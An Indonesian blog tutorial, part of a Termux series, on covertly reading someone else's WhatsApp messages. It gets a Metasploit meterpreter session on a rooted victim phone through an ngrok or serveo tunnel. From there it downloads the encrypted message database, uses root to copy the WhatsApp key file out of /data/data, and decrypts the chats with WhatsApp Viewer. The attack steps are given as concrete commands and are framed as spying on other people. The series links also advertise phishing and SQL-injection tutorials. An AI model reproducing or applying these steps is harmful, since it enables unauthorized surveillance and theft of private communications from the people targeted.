Saturday, June 15, 2019

Cara Menggunakan Termux untuk Expert, Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit (PC+ROOT)

Cara Menggunakan Termux untuk Expert, Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit (PC+ROOT)
Bisakah Whatsapp di Sadap ? potentially NO

Bisakah Whatsapp di bajak ? potentially NO

Bisakah Whatsapp di intip ? YES

Apakah mudah ? NO

Sudah setahun saya, dan anggota grup cuman android belajar bareng di grup telegram, serta di web ini, dan tidak pernah luput dari pertanyaan di atas.

Maka dari itu saya jawab saja sekalian.

Sebenarnya untuk mengintip pesan orang lain (Whatsapp) itu bisa banget, hanya saja terdapat kendala, yaitu terbatasnya alat untuk mengakses file KEY yang ada di root direktori.

karena untuk "mengintip" whatsapp seseorang, minimal kita harus memiliki 2 file penting

  • Ciphertext Key (Paling sulit)
  • Msgstore.db.Crypt

Dan dengan kata lain, supaya kita bisa mencuri kedua file di atas, maka target kita harus lah memiliki hp yang sudah root.

Untuk hp kita sendiri tidak masalah di root atau tidak, pointnya adalah si target kita ini.

Maka dari itu, cara yang sebenarnya tersedia di khususkan untuk hp target yang sudah di root.

Jika agan ingin mencoba, silahkan ikuti tutorial di bawah ini :

Bahan dan Alat Bobol Whatsapp


-Hp Android (termux, metasploit) (gak di root gak masalah)
-PC/Laptop (whatsappviewer)
-Hp Korban sudah di root (untuk tester bisa pake hp sediri, tapi wajib root)

Membuat Payload Menggunakan Metasploit di Termux Sekaligus Proses Mengambil (msgstorage.db.crypt dan cipher text key)


Langkah 1 - Buat payload, bisa pake serveo atau ngrok, dan pastikan sudah terbuat session atau sesi, jika sudah masuk ke sesi tersebut, maka akan muncul : 

meterpreter>

Gak paham ? baca tentang metasploit di sini 

Langkah 2 - Jika sudah muncul, ketikan perintah di bawah ini di meterpreter :

cd /
cd /sdcard/WhatsApp
ls 

Langkah 3 - maka akan muncul direktori whatsapp, kemudian pilih, dan masuk ke direktori Databases

cd Databases

kemudian akan muncul file msgstore.db.crypt

file tersebut tidak harus crypt8, bisa juga crypt12, tinggal di sesuaikan.

Langkah 4 - Kemudian download filenya, dengan mengetik :

download msgstore.db.crypt12 (nomor crypt di sesuaikan.)


Langkah 5 - Selanjutnya adalah memberikan root previlage (maka izinkan) atau akses root.

Pada meterpreter, ketikan shell

shell
su

Langkah 6 - Pastikan telah memilih grant atau izinkan, jika sudah lanjutkan dengan mengetikan perintah berikut secara terurut  : 

cd /
cd /data/data
ls
cd com.whatsapp
ls
cd files
ls
cp key /sdcard/Download

Langkah 7 - Setelah selesai, kita perlu terminate shellnya, dengan cara pencet tombol ctrl + c atau tombol volume bawah + huruf c pada keyboard.

Langkah 8 - Kemudian ketika di tanya "Terminate Channel ? [y/N]" pilih y.

Langkah 9 - Jika sudah keluar dari shell, maka lanjutkan dengan mengetik perintah di bawah ini

cd /sdcard/Download
download key


Nah sekarang kalian sudah mempunyai 2 bahan penting yaitu file crypt, dan key.

Kedua file tersebut ada di halaman utama atau home di termux, untuk memindahkannya kalian bisa memanfaatkan akses termux-setup-storage.

Kemudian pindahkan saja ke folder download atau folder lain yang berada di direktori storage.

Sekarang kirim kedua file tersebut ke pc/laptop kalian.

Proses Membuka (database msgstorage.db.crypt dan cipher text key) Menggunakan Software Whatsapp Viewer. 


Untuk whatsapp viewer caranya cukup gampang

Langkah 1 - Download filenya di bawah ini, kemudian ekstrak, dan extrak lagi file bernama whatsappviewer.zip dan jalankan file .exe nya di pc/laptop kalian.


Langkah 2 - Setelah terbuka, buka 'file' lalu pilih crypt yang sesuai yang agan dapatkan, jika dapatnya crypt12 maka pilih Decrypt.crypt12.


Database File : adalah file msgstore.db.cryptnya
Key File : adalah key yang sudah kita ambil dari root direktori.

lalu pilih oke.

Foto dari forum nullbyte, dan hanya contoh

Langkah 3 - Setelah klik oke, maka nanti agan akan di minta menyimpan file .db.

Nah simpan file tersebut di folder yang agan mau.

Langkah 4 - Setelah itu, buka lagi Whatsapp Viewer > buka 'file' > pilih 'open' > lalu buka file .db yang tadi sudah agan Save atau simpan.

Foto dari forum nullbyte, dan hanya contoh

Hasil

Cara Menggunakan Termux untuk Expert, Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit (PC+ROOT)

Rangkuman dari materi kali ini adalah 

Mengambil msgstorage.db.crypt dan key, kemudian di cek melalui whatsappviewer.

Dan yg paling sulit adalah mengambil key, karena butuh akses root di hp korban.

Kita tidak bisa sadap wa 24/H karena mereka memiliki update/restore database, untuk itu hal tersebut lah yang kita manfaatkan untuk melihat pesan, setidaknya kita masih bisa ngintip bukan ? hehehe.

Materi masih akan berlanjut......

Part lanjutan untuk belajar termux :

#Part ke 2 :

- Cara Menggunakan Termux untuk Pemula, Part 2 : Pemasangan dan Penggunaan Package di Termux [Guide] - Tanpa Root  

#Part ke 3 :

Cara Menggunakan Termux untuk Pemula, Part 3 : Cara Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

#Part ke 4 :

Cara Menggunakan Termux untuk Pemula, Part 4 : Cara Memasang Hacking Toolbox, dan Menggunakannya (Lazymux) - Tanpa Root

#Part ke 5 :

- Cara Menggunakan Termux untuk Pemula, Part 5 : Nambang Crypto pake Termux - Tnapa Root

#Part ke 6 :

Cara Menggunakan Termux untuk Pemula, Part 6 : Membuat Script Sendiri  - Tanpa Root

#Part ke 7 :

- Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#Part ke 8 :

- Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

#Part ke 9 :

- Cara Menggunakan Termux untuk Menengah, Part 9 : Cara Terbaru Memasang package NGROK di Termux Android [TANPA ROOT]

#Part ke 10 :

- Cara Menggunakan Termux untuk Menengah, Part 10 : Seni menggunakan weeman untuk menjebak seseorang menggunakan Termux (Tanpa Root)

#Part ke 11 :

- Cara Menggunakan Termux untuk Menengah, Part 11 : Cara Paling Halal Mendapatkan Follower Instagram Melalui Termux Android [100% Gratis + Tanpa Root]

#Part ke 12 :

- Cara Menggunakan Termux untuk Expert , Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit 

#Part ke 13 : Belum Rilis

Nyesel loh kalo gak nanya ;)
EmoticonEmoticon